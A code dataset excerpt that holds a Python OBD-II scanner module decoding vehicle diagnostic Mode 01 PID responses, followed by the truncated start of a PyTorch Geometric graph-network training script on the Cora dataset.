+{"seq_id":"26798078063","text":"import copy\n\nfrom obd.message import register_response_class\nfrom obd.message.response import Response\nfrom obd.message.value import *\nfrom obd.util import *\n\n###################################\n# PID $00, $20, $40, $60, $80, $A0, $C0, $E0\n\nclass PIDSupportResponse(Response):\n \"\"\"Encapsulates the response to PID-supported requests.\n \n This is also used for other similar requests, such as INFTYPs in SID $09.\n In addition to the standard Response (Message) attributes, this object\n provides:\n \n pid_supported[PID] -- a boolean value indicating whether a PID is supported;\n this will only include values reported by this response\n (pid+1...pid+0x20)\n supported_pids[] -- a list of the supported PIDs reported by this response;\n this makes iterating over supported PIDs very easy and legible\n \"\"\"\n length = 4\n def __init__(self, message_data, offset, pid):\n assert (pid & 0x1F) == 0\n Response.__init__(self, message_data, offset, pid)\n\n self.pid_supported = {}\n self.supported_pids = []\n bits = self.decode_integer(self.data_bytes)\n for pid_bit in range(1, 33):\n # test each bit in the integer corresponding to each PID\n pid_supported = (bits & (1 << (32 - pid_bit))) != 0\n pid = self.pid + pid_bit\n self.pid_supported[pid] = pid_supported\n if pid_supported:\n self.supported_pids.append(pid)\n return\n\n\n###################################\n# PID $01\n\nclass MonitorTest(object):\n \"\"\"Encapsulates one system monitor test as returned by Service $01, PID $01.\n \n The actual response (see MonitorStatusResponse) describes multiple such\n tests.\n \n name -- the name of the test\n supported -- a boolean indicating whether the test is supported by the\n vehicle\n ready -- only applicable if the test is supported, a boolean indicating\n whether the test is ready\n status() -- returns a string representing the test status\n \"\"\"\n def __init__(self, name, supported, ready):\n self.name = name\n self.supported = supported\n self.ready = ready\n\n def status(self):\n \"\"\"Return a string representing the system monitor's status.\n\n Ready/Not Ready only apply if the system monitor is supported.\n \"\"\"\n status = \"Not Supported\"\n if (self.supported):\n if (self.ready):\n status = \"Ready\"\n else:\n status = \"Not Ready\"\n return status\n\n def __str__(self):\n return \"%s: %s\" % (self.name, self.status())\n\n\nclass TestReady(Boolean):\n \"\"\"Encapsulates test \"ready\" values in OBD responses;\n for some insane reason, 0 = \"ready\", and 1 = not ready\"\"\"\n def _convert_value(self, raw_value):\n \"\"\"Invert the raw bit into the actual value represented;\n i.e., ready is True or False\"\"\"\n return not raw_value\n\n\nclass MonitorStatusResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 01 request.\n\n mil -- a boolean indicating whether the Malfunction Indicator Light\n (MIL) is lighted\n dtc_count -- the number of Diagnostic Trouble Codes (DTCs) logged by the\n on-board diagnostics\n monitors -- a dict of MonitorTest objects, one for each system monitor\n continuous_monitors -- a list of Continuous Monitor keys\n non_continuous_monitors -- a list of Non-Continuous Monitor keys\n \n emissions_status() -- returns a string summarizing the readiness of\n common state emissions tests\n supported_monitors() -- returns a list of supported monitor keys\n incomplete_monitors() -- returns a list of incomplete (but supported)\n monitor keys\n \"\"\"\n length = 4\n _value_factories = [\n Factory(\"DTC_CNT\", Value, [\"A0\", \"A6\"]),\n Factory(\"MIL\", OnOffBoolean, \"A7\"),\n Factory(\"MIS_SUP\", Boolean, \"B0\"),\n Factory(\"FUEL_SUP\", Boolean, \"B1\"),\n Factory(\"CCM_SUP\", Boolean, \"B2\"),\n # B3 is used to select spark vs. compression ignition\n # (diesel) tests; see __init__()\n Factory(\"MIS_RDY\", TestReady, \"B4\"),\n Factory(\"FUEL_RDY\", TestReady, \"B5\"),\n Factory(\"CCM_RDY\", TestReady, \"B6\")\n ]\n _spark_value_factories = [\n Factory(\"CAT_SUP\", Boolean, \"C0\"),\n Factory(\"HCAT_SUP\", Boolean, \"C1\"),\n Factory(\"EVAP_SUP\", Boolean, \"C2\"),\n Factory(\"AIR_SUP\", Boolean, \"C3\"),\n Factory(\"ACRF_SUP\", Boolean, \"C4\"),\n Factory(\"O2S_SUP\", Boolean, \"C5\"),\n Factory(\"HTR_SUP\", Boolean, \"C6\"),\n Factory(\"EGR_SUP\", Boolean, \"C7\"),\n Factory(\"CAT_RDY\", TestReady, \"D0\"),\n Factory(\"HCAT_RDY\", TestReady, \"D1\"),\n Factory(\"EVAP_RDY\", TestReady, \"D2\"),\n Factory(\"AIR_RDY\", TestReady, \"D3\"),\n Factory(\"ACRF_RDY\", TestReady, \"D4\"),\n Factory(\"O2S_RDY\", TestReady, \"D5\"),\n Factory(\"HTR_RDY\", TestReady, \"D6\"),\n Factory(\"EGR_RDY\", TestReady, \"D7\"),\n ]\n _diesel_value_factories = [\n Factory(\"HCCATSUP\", Boolean, \"C0\"),\n Factory(\"NCAT_SUP\", Boolean, \"C1\"),\n Factory(\"BP_SUP\", Boolean, \"C3\"),\n Factory(\"EGS_SUP\", Boolean, \"C5\"),\n Factory(\"PM_SUP\", Boolean, \"C6\"),\n Factory(\"EGR_SUP\", Boolean, \"C7\"),\n Factory(\"HCCATRDY\", TestReady, \"D0\"),\n Factory(\"NCAT_RDY\", TestReady, \"D1\"),\n Factory(\"BP_RDY\", TestReady, \"D3\"),\n Factory(\"EGS_RDY\", TestReady, \"D5\"),\n Factory(\"PM_RDY\", TestReady, \"D6\"),\n Factory(\"EGR_RDY\", TestReady, \"D7\"),\n ]\n\n _monitor_definitions = {\n # See http://obddiagnostics.com/obdinfo/pids1-2.html\n # and http://en.wikipedia.org/wiki/OBD-II_PIDs#Bitwise_encoded_PIDs\n \"misfire\": [\"Misfire\", \"MIS_SUP\", \"MIS_RDY\"],\n \"fuel_system\": [\"Fuel System\", \"FUEL_SUP\", \"FUEL_RDY\"],\n \"components\": [\"Components\", \"CCM_SUP\", \"CCM_RDY\"],\n # Spark\n \"catalyst\": [\"Catalyst\", \"CAT_SUP\", \"CAT_RDY\"],\n \"catalyst_heater\": [\"Catalyst Heater\", \"HCAT_SUP\", \"HCAT_RDY\"],\n \"evap\": [\"Evaporative System\", \"EVAP_SUP\", \"EVAP_RDY\"],\n \"secondary_air\": [\"Secondary Air System\", \"AIR_SUP\", \"AIR_RDY\"],\n \"ac\": [\"A/C System\", \"ACRF_SUP\", \"ACRF_RDY\"],\n \"o2\": [\"O2 Sensor\", \"O2S_SUP\", \"O2S_RDY\"],\n \"o2_heater\": [\"O2 Sensor Heater\", \"HTR_SUP\", \"HTR_RDY\"],\n # Diesel\n \"nmhc_catalyst\": [\"NMHC Catalyst\", \"HCCATSUP\", \"HCCATRDY\"],\n \"nox\": [\"NOx Aftertreatment\", \"NCAT_SUP\", \"NCAT_RDY\"],\n \"egs\": [\"Exhaust Gas Sensor\", \"EGS_SUP\", \"EGS_RDY\"],\n \"pm_filter\": [\"PM Filter\", \"PM_SUP\", \"PM_RDY\"],\n # Both\n \"egr\": [\"Exhaust Gas Recirculation (EGR)\", \"EGR_SUP\", \"EGR_RDY\"],\n }\n ordered_monitors = [ \"misfire\", \"fuel_system\", \"components\",\n \"catalyst\", \"catalyst_heater\",\n \"evap\", \"secondary_air\", \"ac\", \"o2\", \"o2_heater\",\n \"nmhc_catalyst\", \"nox\", \"egs\", \"pm_filter\",\n \"egr\" ]\n continuous_monitors = set([ \"misfire\", \"fuel_system\", \"components\" ])\n non_continuous_monitors = set(ordered_monitors) - continuous_monitors\n\n def __init__(self, message_data, offset, pid):\n \"\"\"Initialize the object from the raw response from the vehicle\"\"\"\n ValueResponse.__init__(self, message_data, offset, pid)\n # Choose the appropriate ignition-specific factories\n self.diesel = self.bit(\"B3\")\n if self.diesel:\n factories = self._diesel_value_factories\n else:\n factories = self._spark_value_factories\n # Extract ignition-specific values\n for factory in factories:\n value = factory.extract_value(self)\n self.values.append(value)\n # Create a temporary dict of values\n values = {}\n for value in self.values:\n values[value.label] = value.value\n # Set up the structured attributes based on the values\n self.mil = values[\"MIL\"]\n self.dtc_count = values[\"DTC_CNT\"]\n self.monitors = {}\n for key, defn in self._monitor_definitions.items():\n name, supported, ready = defn\n try:\n supported = values[supported]\n ready = values[ready]\n self.monitors[key] = MonitorTest(name, supported, ready)\n except KeyError as e:\n # skip the irrelevant (spark vs. diesel) monitors\n pass\n return\n\n def _monitors_status(self, monitors):\n \"\"\"(Internal) Return a string of the status of the specified monitors.\n\n monitors -- a set of monitor keys to query\"\"\"\n s = \"\"\n for key in self.ordered_monitors:\n if key in monitors and key in self.monitors:\n m = self.monitors[key]\n s += \"%-40s %s\\n\" % (m.name + \" Monitor\", m.status())\n return s\n\n def emissions_status(self):\n \"\"\"Return a string approximating state inspection readiness results.\"\"\"\n if self.diesel:\n untested()\n return self._monitors_status(self.non_continuous_monitors)\n\n def supported_monitors(self):\n \"\"\"Return a set of supported monitor keys.\"\"\"\n if self.diesel:\n untested()\n supported = set([])\n for key, m in self.monitors.items():\n if (m.status() != \"Not Supported\"):\n supported.add(key)\n return supported\n\n def incomplete_monitors(self):\n \"\"\"Return a set of incomplete (but supported) monitor keys.\"\"\"\n if self.diesel:\n untested()\n incomplete = set([])\n for key, m in self.monitors.items():\n if (m.status() == \"Not Ready\"):\n incomplete.add(key)\n return incomplete\n\n\n###################################\n# PID $03\n\nclass FuelSystemStatus(Bitfield):\n _fields = {\n 0x01: \"OL\",\n 0x02: \"CL\",\n 0x04: \"OL-Drive\",\n 0x08: \"OL-Fault\",\n 0x10: \"CL-Fault\",\n }\n\nclass FuelSystemResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 03 request\"\"\"\n length = 2\n _value_factories = [\n Factory(\"FUELSYS1\", FuelSystemStatus, \"A\"),\n Factory(\"FUELSYS2\", FuelSystemStatus, \"B\")\n ]\n\n\n###################################\n# PID $04\n\nclass LoadValueResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 04 request\"\"\"\n length = 1\n _value_factories = [Factory(\"LOAD_PCT\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $05\n\nclass LowTemperature(Temperature):\n \"\"\"Encapsulates temperatures between -40 and +215 degC\"\"\"\n def _convert_value(self, raw_value):\n return raw_value - 40.0\n\nclass EngineCoolantTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 05 request\"\"\"\n length = 1\n _value_factories = [Factory(\"ECT\", LowTemperature, \"A\")]\n\n\n###################################\n# PID $06-$09, $55-58\n\nclass FuelTrim(Percentage):\n \"\"\"Encapsulates fuel trim values encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value / 128.0) - 1.0\n\nclass FuelTrimResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01 fuel trim requests\n (PID 06-09, 55-58)\"\"\"\n # NOTE: length is variable, either 1 or 2 bytes depending on\n # how many banks of oxygen sensors there are.\n _value_factories = [\n Factory(\"A\", FuelTrim, \"A\"),\n Factory(\"B\", FuelTrim, \"B\")\n ]\n\ndef _fuel_trim_response(pid, labels):\n \"\"\"Create the PID-specific variant of the fuel trim response\"\"\"\n response_class = value_response_variant(pid, FuelTrimResponse)\n assert len(labels) == len(response_class._value_factories)\n # Override the value factories using the given labels\n for i, label in enumerate(labels):\n response_class._value_factories[i].label = label\n return response_class\n\n\n###################################\n# PID $0A, $22, $23, $59\n\nclass FuelRailPressureResponse(ValueResponse):\n length = 1\n # 22, 23, and 59 use two bytes\n _value_factories = [Factory(\"FRP\", Pressure, [\"A\", \"B\"])]\n\ndef _fuel_rail_pressure_response(pid, scale, byte_labels=None):\n response_class = value_response_variant(pid, FuelRailPressureResponse)\n # override the conversion function using the given scale factor\n factory = response_class._value_factories[0]\n factory.convert = lambda p: scale * p\n # override the byte labels if given (for PID $0A)\n if byte_labels:\n factory.set_range(byte_labels)\n response_class.length = len(factory.range)\n return response_class\n\n\n###################################\n# PID $0B\n\nclass ManifoldAbsolutePressureResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 33 request\"\"\"\n length = 1\n # TODO: tweak the pressure instance so that its imperial measure\n # is inHg instead of PSI\n _value_factories = [Factory(\"MAP\", Pressure, \"A\")]\n\n\n###################################\n# PID $0C\n\nclass EngineRPM(RPM):\n \"\"\"Encapsulates engine RPM encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return raw_value / 4.0\n \nclass EngineRPMResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0C request\"\"\"\n length = 2\n _value_factories = [Factory(\"RPM\", EngineRPM, [\"A\", \"B\"])]\n\n\n###################################\n# PID $0D\n\nclass VehicleSpeedResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0D request\"\"\"\n length = 1\n _value_factories = [Factory(\"VSS\", Velocity, \"A\")]\n\n\n###################################\n# PID $0E\n\nclass IgnitionTiming(Timing):\n \"\"\"Encapsulates ignition timing encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value - 128) * 0.5\n\nclass IgnitionTimingResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0E request\"\"\"\n length = 1\n _value_factories = [Factory(\"SPARKADV\", IgnitionTiming, \"A\")]\n\n\n###################################\n# PID $0F\n\nclass IntakeAirTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0F request\"\"\"\n length = 1\n _value_factories = [Factory(\"IAT\", LowTemperature, \"A\")]\n\n\n###################################\n# PID $10\n\nclass AirFlowRate(Value):\n \"\"\"Encapsulates engine air flow rate encoded in OBD responses\"\"\"\n units = \"g/s\"\n def _convert_value(self, raw_value):\n return raw_value / 100.0\n _value_fmt = \"%.2f\"\n def __str__(self):\n metric = self._value_str()\n imperial = self.value * 60.0 / 453.59237\n imperial = self._value_fmt % imperial\n return \"%s=%s g/s (%s lb/min)\" % (self.label, metric, imperial)\n \nclass MassAirFlowResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 10 request\"\"\"\n length = 2\n _value_factories = [Factory(\"MAF\", AirFlowRate, [\"A\", \"B\"])]\n\n\n###################################\n# PID $11\n\nclass AbsoluteThrottleResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 11 request\"\"\"\n length = 1\n _value_factories = [Factory(\"TP\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $13\n\nclass O2SLocation2Bank(Bitfield):\n _fields = {\n 0x01: \"O2S11\",\n 0x02: \"O2S12\",\n 0x04: \"O2S13\",\n 0x08: \"O2S14\",\n 0x10: \"O2S21\",\n 0x20: \"O2S22\",\n 0x40: \"O2S23\",\n 0x80: \"O2S24\",\n }\n\nclass O2SLocation2BankResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 13 request\"\"\"\n length = 1\n _value_factories = [Factory(\"O2SLOC\", O2SLocation2Bank, \"A\")]\n\n\n###################################\n# PID $14-1B\n\nclass O2SensorVoltage(Voltage):\n \"\"\"Encapsulates voltages between 0V and 1.275V\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 0.005\n _value_fmt = \"%.3f\"\n \nclass O2SensorResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 2\n _value_factories = [\n Factory(\"O2S\", O2SensorVoltage, \"A\"),\n Factory(\"SHRTFT\", FuelTrim, \"B\")\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \ndef _o2_sensor_response(pid, base_response, banks_and_sensors):\n \"\"\"Create the PID-specific variant of the O2 sensor response\"\"\"\n response_class = value_response_variant(pid, base_response)\n # Set up new value factories for each bank and sensor given\n factories = []\n for bank_and_sensor in banks_and_sensors:\n for factory in response_class._value_factories:\n factory = copy.deepcopy(factory)\n factory.label = factory.label + bank_and_sensor\n factories.append(factory)\n response_class._value_factories = factories\n return response_class\n\n\n###################################\n# PID $1C\n\nclass OBDSupport(Enumeration):\n _values = {\n 0x01: \"OBD II\",\n 0x02: \"OBD\",\n 0x03: \"OBD and OBD II\",\n 0x04: \"OBD I\",\n 0x05: \"NO OBD\",\n 0x06: \"EOBD\",\n 0x07: \"EOBD and OBD II\",\n 0x08: \"EOBD and OBD\",\n 0x09: \"EOBD, OBD, and OBD II\",\n 0x0A: \"JOBD\",\n 0x0B: \"JOBD and OBD II\",\n 0x0C: \"JOBD and EOBD\",\n 0x0D: \"JOBD, EOBD, and OBD II\",\n 0x11: \"EMD\",\n 0x12: \"EMD+\",\n 0x13: \"HD OBD-C\",\n 0x14: \"HD OBD\",\n 0x15: \"WWH OBD\",\n 0x17: \"HD EOBD-I\",\n 0x18: \"HD EOBD-I N\",\n 0x19: \"HD EOBD-II\",\n 0x1A: \"HD EOBD-II N\",\n 0x1C: \"OBDBr-1\",\n 0x1D: \"OBDBr-2\",\n }\n\nclass OBDSupportResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 1C request\"\"\"\n length = 1\n _value_factories = [Factory(\"OBDSUP\", OBDSupport, \"A\")]\n\n\n###################################\n# PID $1D\n\nclass O2SLocation4Bank(Bitfield):\n _fields = {\n 0x01: \"O2S11\",\n 0x02: \"O2S12\",\n 0x04: \"O2S21\",\n 0x08: \"O2S22\",\n 0x10: \"O2S31\",\n 0x20: \"O2S32\",\n 0x40: \"O2S41\",\n 0x80: \"O2S42\",\n }\n\nclass O2SLocation4BankResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 1D request\"\"\"\n length = 1\n _value_factories = [Factory(\"O2SLOC\", O2SLocation4Bank, \"A\")]\n\n\n###################################\n# PID $1F\n\nclass EngineRuntimeResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 1F request\"\"\"\n length = 2\n _value_factories = [Factory(\"RUNTM\", Duration, [\"A\", \"B\"])]\n\n\n###################################\n# PID $21\n\nclass MILDistanceResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 21 request\"\"\"\n length = 2\n _value_factories = [Factory(\"MIL_DIST\", Distance, [\"A\", \"B\"])]\n\n\n###################################\n# PID $24-2B\n\nclass O2SensorLambda(Value):\n \"\"\"Encapsulates equivalence ratio (lambda)\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 0.0000305\n _value_fmt = \"%.3f\"\n \nclass O2SensorWideVoltage(Voltage):\n \"\"\"Encapsulates voltages between 0V and 7.999V\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 8.0 / 65535.0\n _value_fmt = \"%.3f\"\n \nclass O2SensorWideResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 4\n _value_factories = [\n Factory(\"LAMBDA\", O2SensorLambda, [\"A\", \"B\"]),\n Factory(\"O2S\", O2SensorWideVoltage, [\"C\", \"D\"]),\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D; we may change the class\n # hierarchy to inherit from O2SensorResponse\n # TODO: adjust the scaling at runtime depending on the\n # maximum values specified by PID $4F (when present)\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \n\n###################################\n# PID $2F\n\nclass FuelLevelResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 2F request\"\"\"\n length = 1\n _value_factories = [Factory(\"FLI\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $33\n\nclass BarometricPressureResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 33 request\"\"\"\n length = 1\n # TODO: tweak the pressure instance so that its imperial measure\n # is inHg instead of PSI\n _value_factories = [Factory(\"BARO\", Pressure, \"A\")]\n\n\n###################################\n# PID $34-3B\n\nclass O2SensorCurrent(Current):\n \"\"\"Encapsulates voltages between 0V and 7.999V\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value * 128.0 / 32768.0) - 128.0\n \nclass O2SensorCurrentResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 4\n _value_factories = [\n Factory(\"LAMBDA\", O2SensorLambda, [\"A\", \"B\"]),\n Factory(\"O2S\", O2SensorCurrent, [\"C\", \"D\"]),\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D; we may change the class\n # hierarchy to inherit from O2SensorResponse\n # TODO: adjust the scaling at runtime depending on the\n # maximum values specified by PID $4F (when present)\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \n\n###################################\n# PID $42\n\nclass ControlModuleVoltage(Voltage):\n \"\"\"Encapsulates engine RPM encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return raw_value / 1000.0\n \nclass ControlModuleVoltageResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 42 request\"\"\"\n length = 2\n _value_factories = [Factory(\"VPWR\", ControlModuleVoltage, [\"A\", \"B\"])]\n\n\n###################################\n# PID $45\n\nclass RelativeThrottleResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 45 request\"\"\"\n length = 1\n _value_factories = [Factory(\"TP_R\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $46\n\nclass AmbientAirTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 46 request\"\"\"\n length = 1\n _value_factories = [Factory(\"AAT\", LowTemperature, \"A\")]\n\n\n###################################\n# Registration\n\n_pid_classes = {\n 0x00: PIDSupportResponse,\n 0x01: MonitorStatusResponse,\n 0x03: FuelSystemResponse,\n 0x04: LoadValueResponse,\n 0x05: EngineCoolantTempResponse,\n 0x06: _fuel_trim_response(0x06, [\"SHRTFT1\", \"SHRTFT3\"]),\n 0x07: _fuel_trim_response(0x07, [\"LONGFT1\", \"LONGFT3\"]),\n 0x08: _fuel_trim_response(0x08, [\"SHRTFT2\", \"SHRTFT4\"]),\n 0x09: _fuel_trim_response(0x09, [\"LONGFT2\", \"LONGFT4\"]),\n 0x0A: _fuel_rail_pressure_response(0x0A, 3.0, [\"A\"]),\n 0x0B: ManifoldAbsolutePressureResponse,\n 0x0C: EngineRPMResponse,\n 0x0D: VehicleSpeedResponse,\n 0x0E: IgnitionTimingResponse,\n 0x0F: IntakeAirTempResponse,\n 0x10: MassAirFlowResponse,\n 0x11: AbsoluteThrottleResponse,\n 0x13: O2SLocation2BankResponse,\n 0x14: _o2_sensor_response(0x14, O2SensorResponse, [\"11\"]),\n 0x15: _o2_sensor_response(0x15, O2SensorResponse, [\"12\"]),\n 0x16: _o2_sensor_response(0x16, O2SensorResponse, [\"13\", \"21\"]),\n 0x17: _o2_sensor_response(0x17, O2SensorResponse, [\"14\", \"22\"]),\n 0x18: _o2_sensor_response(0x18, O2SensorResponse, [\"21\", \"31\"]),\n 0x19: _o2_sensor_response(0x19, O2SensorResponse, [\"22\", \"32\"]),\n 0x1A: _o2_sensor_response(0x1A, O2SensorResponse, [\"23\", \"41\"]),\n 0x1B: _o2_sensor_response(0x1B, O2SensorResponse, [\"24\", \"42\"]),\n 0x1C: OBDSupportResponse,\n 0x1D: O2SLocation4BankResponse,\n 0x1F: EngineRuntimeResponse,\n 0x20: PIDSupportResponse,\n 0x21: MILDistanceResponse,\n 0x22: _fuel_rail_pressure_response(0x22, 0.079),\n 0x23: _fuel_rail_pressure_response(0x23, 10.0),\n 0x24: _o2_sensor_response(0x24, O2SensorWideResponse, [\"11\"]),\n 0x25: _o2_sensor_response(0x25, O2SensorWideResponse, [\"12\"]),\n 0x26: _o2_sensor_response(0x26, O2SensorWideResponse, [\"13\", \"21\"]),\n 0x27: _o2_sensor_response(0x27, O2SensorWideResponse, [\"14\", \"22\"]),\n 0x28: _o2_sensor_response(0x28, O2SensorWideResponse, [\"21\", \"31\"]),\n 0x29: _o2_sensor_response(0x29, O2SensorWideResponse, [\"22\", \"32\"]),\n 0x2A: _o2_sensor_response(0x2A, O2SensorWideResponse, [\"23\", \"41\"]),\n 0x2B: _o2_sensor_response(0x2B, O2SensorWideResponse, [\"24\", \"42\"]),\n 0x2F: FuelLevelResponse,\n 0x33: BarometricPressureResponse,\n 0x34: _o2_sensor_response(0x34, O2SensorCurrentResponse, [\"11\"]),\n 0x35: _o2_sensor_response(0x35, O2SensorCurrentResponse, [\"12\"]),\n 0x36: _o2_sensor_response(0x36, O2SensorCurrentResponse, [\"13\", \"21\"]),\n 0x37: _o2_sensor_response(0x37, O2SensorCurrentResponse, [\"14\", \"22\"]),\n 0x38: _o2_sensor_response(0x38, O2SensorCurrentResponse, [\"21\", \"31\"]),\n 0x39: _o2_sensor_response(0x39, O2SensorCurrentResponse, [\"22\", \"32\"]),\n 0x3A: _o2_sensor_response(0x3A, O2SensorCurrentResponse, [\"23\", \"41\"]),\n 0x3B: _o2_sensor_response(0x3B, O2SensorCurrentResponse, [\"24\", \"42\"]),\n 0x40: PIDSupportResponse,\n 0x42: ControlModuleVoltageResponse,\n 0x45: RelativeThrottleResponse,\n 0x46: AmbientAirTempResponse,\n 0x55: _fuel_trim_response(0x55, [\"STSO2FT1\", \"STSO2FT3\"]),\n 0x56: _fuel_trim_response(0x56, [\"LGSO2FT1\", \"LGSO2FT3\"]),\n 0x57: _fuel_trim_response(0x57, [\"STSO2FT2\", \"STSO2FT4\"]),\n 0x58: _fuel_trim_response(0x58, [\"LGSO2FT2\", \"LGSO2FT4\"]),\n 0x59: _fuel_rail_pressure_response(0x59, 10.0),\n 0x60: PIDSupportResponse,\n 0x80: PIDSupportResponse,\n 0xA0: PIDSupportResponse,\n 0xC0: PIDSupportResponse,\n 0xE0: PIDSupportResponse,\n }\n\nfor _pid, class_ in _pid_classes.items():\n register_response_class(sid=0x01, pid=_pid, cls=class_)\n\n\"\"\"\nlengths = {\n 0x01: { # SID $01\n 0x02: 2,\n 0x03: 2,\n 0x04: 1,\n 0x05: 1,\n # 6-9 are 1-or-2\n 0x0A: 1,\n 0x0B: 1,\n 0x0C: 2,\n 0x0D: 1,\n 0x0E: 1,\n 0x0F: 1,\n 0x10: 2,\n 0x11: 1,\n 0x12: 1,\n 0x13: 1,\n 0x14: 2,\n 0x15: 2,\n 0x16: 2,\n 0x17: 2,\n 0x18: 2,\n 0x19: 2,\n 0x1A: 2,\n 0x1B: 2,\n 0x1C: 1,\n 0x1D: 1, \n 0x1E: 1,\n 0x1F: 2,\n 0x21: 2,\n 0x22: 2,\n 0x23: 2,\n 0x24: 4,\n 0x25: 4,\n 0x26: 4,\n 0x27: 4,\n 0x28: 4,\n 0x29: 4,\n 0x2A: 4,\n 0x2B: 4,\n 0x2C: 1,\n 0x2D: 1,\n 0x2E: 1,\n 0x2F: 1,\n 0x30: 1,\n 0x31: 2,\n 0x32: 2,\n 0x33: 1,\n 0x34: 4,\n 0x35: 4,\n 0x36: 4,\n 0x37: 4,\n 0x38: 4,\n 0x39: 4,\n 0x3A: 4,\n 0x3B: 4,\n 0x3C: 2,\n 0x3D: 2,\n 0x3E: 2,\n 0x3F: 2,\n 0x41: 4,\n 0x42: 2,\n 0x43: 2,\n 0x44: 2,\n 0x45: 1,\n 0x46: 1,\n 0x47: 1,\n 0x48: 1,\n 0x49: 1,\n 0x4A: 1,\n 0x4B: 1,\n 0x4C: 1,\n 0x4D: 2,\n 0x4E: 2,\n 0x4F: 4,\n 0x50: 4,\n 0x51: 1,\n 0x52: 1,\n 0x53: 2,\n 0x54: 2,\n # 55-58 are 1-or-2\n 0x59: 2,\n 0x5A: 1,\n 0x5B: 1,\n 0x5C: 1,\n 0x5D: 2,\n 0x5E: 2,\n 0x5F: 1,\n 0x61: 1,\n 0x62: 1,\n 0x63: 2,\n 0x64: 5,\n 0x65: 2,\n 0x66: 5,\n 0x67: 3,\n 0x68: 7,\n 0x69: 7,\n 0x6A: 5,\n 0x6B: 5,\n 0x6C: 5,\n 0x6D: 11,\n 0x6E: 9,\n 0x6F: 3,\n 0x70: 10,\n 0x71: 6,\n 0x72: 5,\n 0x73: 5,\n 0x74: 5,\n 0x75: 7,\n 0x76: 7, \n 0x77: 5,\n 0x78: 9,\n 0x79: 9,\n 0x7A: 7,\n 0x7B: 7,\n 0x7C: 9,\n 0x7D: 1,\n 0x7E: 1,\n 0x7F: 13,\n 0x81: 41,\n 0x82: 41,\n 0x83: 9,\n 0x84: 1,\n 0x85: 10,\n 0x86: 5,\n 0x87: 5,\n 0x88: 13,\n 0x89: 41,\n 0x8A: 41,\n 0x8B: 8, \n },\n\"\"\"\n\n\n# vim: softtabstop=4 shiftwidth=4 expandtab\n","repo_name":"lukevp/Python-OBD-Scanner","sub_path":"pyobd2-0.4/obd/message/sid01.py","file_name":"sid01.py","file_ext":"py","file_size_in_byte":28474,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"79"} +{"seq_id":"24844820543","text":"import numpy as np\nfrom GNN.dataset import load_dataset\nfrom GNN.graph import *\n\nimport torch\nimport torch_geometric as geo\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\nimport time\n\n\ngraph_full = load_dataset(\"Cora\")\ntrain_split = int(0.8 * graph_full.num_nodes)\ngraph_full.add_self_loop()\ngraph = split_training_set(graph_full, train_split)\nnum_features = graph_full.num_features # =1433\nnum_classes = graph_full.num_classes # =7\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(num_features, 16)\n self.conv2 = GCNConv(16, num_classes)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x\n\ndef train_pyg(num_epoch):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model = Net().to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n model.train()\n x = torch.Tensor(graph.x).to(device)\n y = torch.Tensor(graph.y).to(device, torch.long)\n edge_index = torch.Tensor(graph.edge_index).to(device, torch.long)\n start_time = time.time()\n for epoch in range(num_epoch):\n optimizer.zero_grad()\n out = model(x, edge_index)\n loss = F.cross_entropy(out, 